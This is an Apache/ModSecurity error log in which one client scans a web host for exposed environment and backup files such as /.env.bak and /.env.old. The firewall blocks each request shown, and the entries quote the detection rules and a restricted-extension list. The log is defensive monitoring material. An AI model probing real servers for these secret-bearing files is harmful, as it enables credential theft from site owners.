[Sun Nov 16 06:04:53.254282 2025] [:error] [pid 105762] [client 13.62.46.112:40326] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aRlbdYCWhPvKE5MvVu03RwAAAAs"]
[Sun Nov 16 06:04:53.254438 2025] [:error] [pid 105762] [client 13.62.46.112:40326] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aRlbdYCWhPvKE5MvVu03RwAAAAs"]
[Sun Nov 16 06:04:53.254577 2025] [:error] [pid 105762] [client 13.62.46.112:40326] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aRlbdYCWhPvKE5MvVu03RwAAAAs"]
[Sun Nov 16 06:04:53.294469 2025] [authz_core:error] [pid 106192] [client 13.62.46.112:40252] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sun Nov 16 06:04:53.316387 2025] [:error] [pid 105754] [client 13.62.46.112:40230] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.bak"] [unique_id "aRlbdX3mxOhUaPa_1PS3NQAAAAw"]
[Sun Nov 16 06:04:53.316526 2025] [:error] [pid 105754] [client 13.62.46.112:40230] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.bak"] [unique_id "aRlbdX3mxOhUaPa_1PS3NQAAAAw"]
[Sun Nov 16 06:04:53.316685 2025] [:error] [pid 105754] [client 13.62.46.112:40230] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.bak"] [unique_id "aRlbdX3mxOhUaPa_1PS3NQAAAAw"]
[Sun Nov 16 06:04:53.316829 2025] [:error] [pid 105754] [client 13.62.46.112:40230] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.bak"] [unique_id "aRlbdX3mxOhUaPa_1PS3NQAAAAw"]
[Sun Nov 16 06:04:53.317765 2025] [:error] [pid 106191] [client 13.62.46.112:40312] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPgAAAAI"]
[Sun Nov 16 06:04:53.317897 2025] [:error] [pid 106191] [client 13.62.46.112:40312] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPgAAAAI"]
[Sun Nov 16 06:04:53.318036 2025] [:error] [pid 106191] [client 13.62.46.112:40312] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPgAAAAI"]
[Sun Nov 16 06:04:53.318208 2025] [:error] [pid 106191] [client 13.62.46.112:40312] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPgAAAAI"]
[Sun Nov 16 06:04:53.325884 2025] [authz_core:error] [pid 105706] [client 13.62.46.112:40236] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.bak
[Sun Nov 16 06:04:53.343321 2025] [:error] [pid 105760] [client 13.62.46.112:40340] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.tmp"] [unique_id "aRlbdSX-V6YaRQK52Hc2AQAAAAU"]
[Sun Nov 16 06:04:53.343458 2025] [:error] [pid 105760] [client 13.62.46.112:40340] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.tmp"] [unique_id "aRlbdSX-V6YaRQK52Hc2AQAAAAU"]
[Sun Nov 16 06:04:53.343590 2025] [:error] [pid 105760] [client 13.62.46.112:40340] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.tmp"] [unique_id "aRlbdSX-V6YaRQK52Hc2AQAAAAU"]
[Sun Nov 16 06:04:53.359855 2025] [:error] [pid 103446] [client 13.62.46.112:40306] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.old"] [unique_id "aRlbdU-c4YqyOTFJOSeIWwAAAAk"]
[Sun Nov 16 06:04:53.359996 2025] [:error] [pid 103446] [client 13.62.46.112:40306] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.old"] [unique_id "aRlbdU-c4YqyOTFJOSeIWwAAAAk"]
[Sun Nov 16 06:04:53.360201 2025] [:error] [pid 103446] [client 13.62.46.112:40306] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.old"] [unique_id "aRlbdU-c4YqyOTFJOSeIWwAAAAk"]
[Sun Nov 16 06:04:53.360344 2025] [:error] [pid 103446] [client 13.62.46.112:40306] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.old"] [unique_id "aRlbdU-c4YqyOTFJOSeIWwAAAAk"]
[Sun Nov 16 06:04:53.476735 2025] [authz_core:error] [pid 106193] [client 13.62.46.112:40202] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.save
[Sun Nov 16 06:04:55.474698 2025] [:error] [pid 103398] [client 13.62.46.112:55076] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.old"] [unique_id "aRlbd7czEoTwe_Jf335FXgAAAAA"]
[Sun Nov 16 06:04:55.474856 2025] [:error] [pid 103398] [client 13.62.46.112:55076] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.old"] [unique_id "aRlbd7czEoTwe_Jf335FXgAAAAA"]
[Sun Nov 16 06:04:55.475052 2025] [:error] [pid 103398] [client 13.62.46.112:55076] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.old"] [unique_id "aRlbd7czEoTwe_Jf335FXgAAAAA"]
[Sun Nov 16 06:04:55.475215 2025] [:error] [pid 103398] [client 13.62.46.112:55076] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.old"] [unique_id "aRlbd7czEoTwe_Jf335FXgAAAAA"]
[Sun Nov 16 06:04:55.477627 2025] [:error] [pid 105733] [client 13.62.46.112:55092] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aRlbdwm3iQ6of_5tM-vZFgAAAAY"]
[Sun Nov 16 06:04:55.477838 2025] [:error] [pid 105733] [client 13.62.46.112:55092] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aRlbdwm3iQ6of_5tM-vZFgAAAAY"]
[Sun Nov 16 06:04:55.478029 2025] [:error] [pid 105733] [client 13.62.46.112:55092] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aRlbdwm3iQ6of_5tM-vZFgAAAAY"]
[Sun Nov 16 06:04:55.480823 2025] [:error] [pid 105715] [client 13.62.46.112:55074] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.save"] [unique_id "aRlbdzHqqjYXoy22w5Lv8gAAAAE"]
[Sun Nov 16 06:04:55.480993 2025] [:error] [pid 105715] [client 13.62.46.112:55074] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.save"] [unique_id "aRlbdzHqqjYXoy22w5Lv8gAAAAE"]
[Sun Nov 16 06:04:55.481140 2025] [:error] [pid 105715] [client 13.62.46.112:55074] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.save"] [unique_id "aRlbdzHqqjYXoy22w5Lv8gAAAAE"]
[Sun Nov 16 06:04:55.506039 2025] [:error] [pid 105706] [client 13.62.46.112:55102] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.bak"] [unique_id "aRlbd_gkUVuXhjEnxphnTAAAAAQ"]
[Sun Nov 16 06:04:55.506191 2025] [:error] [pid 105706] [client 13.62.46.112:55102] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.bak"] [unique_id "aRlbd_gkUVuXhjEnxphnTAAAAAQ"]
[Sun Nov 16 06:04:55.506367 2025] [:error] [pid 105706] [client 13.62.46.112:55102] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.bak"] [unique_id "aRlbd_gkUVuXhjEnxphnTAAAAAQ"]
[Sun Nov 16 06:04:55.506525 2025] [:error] [pid 105706] [client 13.62.46.112:55102] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env.bak"] [unique_id "aRlbd_gkUVuXhjEnxphnTAAAAAQ"]
[Sun Nov 16 06:04:57.034874 2025] [:error] [pid 105761] [client 13.62.46.112:55104] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.save"] [unique_id "aRlbeRajcO0QlxhJbyzqWgAAAAo"]
[Sun Nov 16 06:04:57.036248 2025] [:error] [pid 105761] [client 13.62.46.112:55104] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.save"] [unique_id "aRlbeRajcO0QlxhJbyzqWgAAAAo"]
[Sun Nov 16 06:04:57.036436 2025] [:error] [pid 105761] [client 13.62.46.112:55104] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.save"] [unique_id "aRlbeRajcO0QlxhJbyzqWgAAAAo"]
